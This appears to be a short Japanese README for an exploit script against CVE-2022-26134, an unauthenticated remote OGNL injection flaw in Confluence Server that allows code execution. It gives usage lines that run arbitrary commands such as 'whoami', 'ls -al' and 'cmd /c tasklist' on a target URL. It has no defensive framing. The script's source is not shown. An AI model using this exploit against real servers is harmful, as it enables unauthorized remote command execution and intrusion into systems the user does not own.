
(CVE-2022-26134)Confluenceサーバーのコンテキストでコード実行を引き起こす、認証不要かつリモートからのOGNLインジェクションの脆弱性
(CVE-2022-26134)認証不要でリモートから実行可能なOGNLインジェクションの脆弱性。Confluenceサーバーのコンテキストでコード実行を引き起こします。
必要環境:Python2 または Python3
使用法:
python cve_2022_26134.py -url target_url -cmd "ls -al"
python cve_2022_26134.py -url target_url -cmd "whoami"

ターゲットがWindowsシステムの場合、以下のようにスクリプトを使用してください。例:
python3 cve_2022_26134.py -url target_url -cmd "cmd /c tasklist"
